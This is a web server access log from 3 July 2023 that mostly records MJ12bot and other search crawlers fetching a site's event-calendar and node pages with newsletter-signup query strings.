65.108.78.33 - - [03/Jul/2023:04:25:54 +0200] "GET /eventscalendar/2017-04-02?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:04 +0200] "GET /eventscalendar/2017-04-03?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:15 +0200] "GET /eventscalendar/2017-04-04?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:26 +0200] "GET /eventscalendar/2017-04-05?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:36 +0200] "GET /eventscalendar/2017-04-06?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:47 +0200] "GET /eventscalendar/2017-04-07?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:26:58 +0200] "GET /eventscalendar/2017-04-08?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:27:08 +0200] "GET /eventscalendar/2017-04-11?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:27:19 +0200] "GET /eventscalendar/2017-04-14?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:27:30 +0200] "GET /eventscalendar/2017-04-16?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:27:41 +0200] "GET /eventscalendar/2017-04-18?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:27:51 +0200] "GET /eventscalendar/2017-04-20?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.25.35.11 - - [03/Jul/2023:04:27:52 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "magpie-crawler/1.1 (robots-txt-checker; +http://www.brandwatch.net)"
185.25.35.15 - - [03/Jul/2023:04:27:53 +0200] "GET /blog/3/feed HTTP/1.1" 200 2701 "-" "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)"
65.108.78.33 - - [03/Jul/2023:04:28:02 +0200] "GET /eventscalendar/2017-04-22?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:28:13 +0200] "GET /eventscalendar/2017-05-04?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:28:23 +0200] "GET /eventscalendar/2017-05-05?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:28:34 +0200] "GET /eventscalendar/2017-05-07?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:28:44 +0200] "GET /eventscalendar/2017-07-29?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:28:55 +0200] "GET /eventscalendar/2017-08-02?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:29:05 +0200] "GET /eventscalendar/2017-08-17?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:29:16 +0200] "GET /eventscalendar/2017-09-01?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:29:27 +0200] "GET /eventscalendar/2017-09-05?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:29:37 +0200] "GET /eventscalendar/2017-09-08?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
162.241.148.12 - - [03/Jul/2023:04:29:45 +0200] "GET / HTTP/1.1" 200 17647 "-" "-"
65.108.78.33 - - [03/Jul/2023:04:29:48 +0200] "GET /eventscalendar/2017-09-12?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:29:59 +0200] "GET /eventscalendar/2017-09-27?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:30:10 +0200] "GET /eventscalendar/2017-09?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:30:20 +0200] "GET /eventscalendar/2017-10-26?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:30:31 +0200] "GET /eventscalendar/2017-11-07?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:30:41 +0200] "GET /eventscalendar/2017-11-08?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:30:52 +0200] "GET /eventscalendar/2017-11-09?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:03 +0200] "GET /eventscalendar/2017-11-10?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:14 +0200] "GET /eventscalendar/2017-11-11?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:24 +0200] "GET /eventscalendar/2017-11-12?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:35 +0200] "GET /eventscalendar/2017-11-20?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:46 +0200] "GET /eventscalendar/2017-11-23?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:31:56 +0200] "GET /eventscalendar/2017-11-24?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:32:07 +0200] "GET /eventscalendar/2017-11-25?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:32:18 +0200] "GET /eventscalendar/2017-11-26?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:32:28 +0200] "GET /eventscalendar/2017-11-27?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:33:29 +0200] "GET /eventscalendar/2017-12-12?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:33:40 +0200] "GET /eventscalendar/2017-12-13?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:33:51 +0200] "GET /eventscalendar/2017-W16?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:02 +0200] "GET /eventscalendar/2017-W34?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:12 +0200] "GET /eventscalendar/2017-W37?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:23 +0200] "GET /eventscalendar/2017-W50?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:34 +0200] "GET /eventscalendar/2017-W52?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:45 +0200] "GET /eventscalendar/2018-08-10?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:34:55 +0200] "GET /eventscalendar/2018-08-11?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:35:06 +0200] "GET /eventscalendar/2018-08-12?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:35:16 +0200] "GET /eventscalendar/2018-08-13?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.36.148.84 - - [03/Jul/2023:04:35:27 +0200] "GET / HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
65.108.78.33 - - [03/Jul/2023:04:35:27 +0200] "GET /eventscalendar/2018-08-14?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:35:37 +0200] "GET /eventscalendar/2018-08-15?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:35:48 +0200] "GET /eventscalendar/2018-08-16?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.132 - - [03/Jul/2023:04:35:56 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:35:59 +0200] "GET /eventscalendar/2018-08-17?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.132 - - [03/Jul/2023:04:36:07 +0200] "GET / HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.132 - - [03/Jul/2023:04:36:09 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:36:09 +0200] "GET /eventscalendar/2018-08-18?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:36:20 +0200] "GET /eventscalendar/2018-08-20?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.132 - - [03/Jul/2023:04:36:20 +0200] "GET / HTTP/1.1" 200 17651 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:36:31 +0200] "GET /eventscalendar/2018-08-24?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:36:42 +0200] "GET /eventscalendar/2018-08-25?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:36:52 +0200] "GET /eventscalendar/2018-08-26?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:03 +0200] "GET /eventscalendar/2018-08-28?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:13 +0200] "GET /eventscalendar/2018-09-28?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:24 +0200] "GET /eventscalendar/2018-09-30?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:35 +0200] "GET /eventscalendar/2018-10-30?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:46 +0200] "GET /eventscalendar/2018-11-18?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:37:56 +0200] "GET /eventscalendar/2018-11-26?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:38:07 +0200] "GET /eventscalendar/2018-11?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:38:17 +0200] "GET /eventscalendar/2018-12-03?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:38:28 +0200] "GET /eventscalendar/2018-12-04?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:38:39 +0200] "GET /eventscalendar/2018-12-05?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
213.180.203.57 - - [03/Jul/2023:04:38:40 +0200] "GET /node/673 HTTP/1.1" 200 9675 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.108.78.33 - - [03/Jul/2023:04:38:49 +0200] "GET /eventscalendar/2018-12-07?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:00 +0200] "GET /eventscalendar/2018-W46?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:11 +0200] "GET /eventscalendar/2018-W47?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:21 +0200] "GET /eventscalendar/2019-08-11?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:32 +0200] "GET /eventscalendar/2020-W1?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:43 +0200] "GET /eventscalendar/2020-W5?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:39:54 +0200] "GET /node HTTP/1.1" 200 17651 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:05 +0200] "GET /node/1000 HTTP/1.1" 200 6830 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:16 +0200] "GET /node/1000?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:27 +0200] "GET /node/1003 HTTP/1.1" 200 15162 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:37 +0200] "GET /node/1003?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:48 +0200] "GET /node/1004 HTTP/1.1" 200 12663 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:40:59 +0200] "GET /node/1005 HTTP/1.1" 200 6387 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:41:10 +0200] "GET /node/1005?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:41:20 +0200] "GET /node/1006 HTTP/1.1" 200 6970 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:41:31 +0200] "GET /node/1006?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:41:42 +0200] "GET /node/1007 HTTP/1.1" 200 10430 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:41:52 +0200] "GET /node/1007?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:42:03 +0200] "GET /node/1008 HTTP/1.1" 200 7224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.77.169 - - [03/Jul/2023:04:42:08 +0200] "GET /eventscalendar/2022-09-17 HTTP/1.1" 200 5796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.108.78.33 - - [03/Jul/2023:04:42:14 +0200] "GET /node/1008?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:42:24 +0200] "GET /node/1009 HTTP/1.1" 200 6415 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:42:35 +0200] "GET /node/1009?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:42:46 +0200] "GET /node/1010 HTTP/1.1" 200 9071 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:42:56 +0200] "GET /node/1010?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:43:07 +0200] "GET /node/1011 HTTP/1.1" 200 8878 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:43:18 +0200] "GET /node/1011?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:43:28 +0200] "GET /node/1012 HTTP/1.1" 200 6151 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:43:39 +0200] "GET /node/1012?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:43:49 +0200] "GET /node/1081 HTTP/1.1" 200 6147 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:44:00 +0200] "GET /node/1081?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:44:11 +0200] "GET /node/1081?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.102.6.34 - - [03/Jul/2023:04:44:19 +0200] "HEAD /blog/3/feed HTTP/1.1" 200 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
65.108.78.33 - - [03/Jul/2023:04:44:21 +0200] "GET /node/1088 HTTP/1.1" 200 8532 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:44:32 +0200] "GET /node/1088?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:44:43 +0200] "GET /node/1092 HTTP/1.1" 200 10627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:44:54 +0200] "GET /node/1092?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:05 +0200] "GET /node/1144 HTTP/1.1" 200 14187 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:15 +0200] "GET /node/1144?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:26 +0200] "GET /node/1146 HTTP/1.1" 200 9639 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:36 +0200] "GET /node/1146?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:47 +0200] "GET /node/120 HTTP/1.1" 200 4625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:45:59 +0200] "GET /node/120?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:46:09 +0200] "GET /node/13197?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:46:20 +0200] "GET /node/138 HTTP/1.1" 200 5623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:46:31 +0200] "GET /node/138?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:46:41 +0200] "GET /node/138?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:46:52 +0200] "GET /node/160 HTTP/1.1" 200 5928 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:03 +0200] "GET /node/161?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:13 +0200] "GET /node/162?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:24 +0200] "GET /node/163 HTTP/1.1" 200 5615 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:35 +0200] "GET /node/163?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:45 +0200] "GET /node/164 HTTP/1.1" 200 5889 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:47:56 +0200] "GET /node/164?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:48:06 +0200] "GET /node/164?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:48:17 +0200] "GET /node/165?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
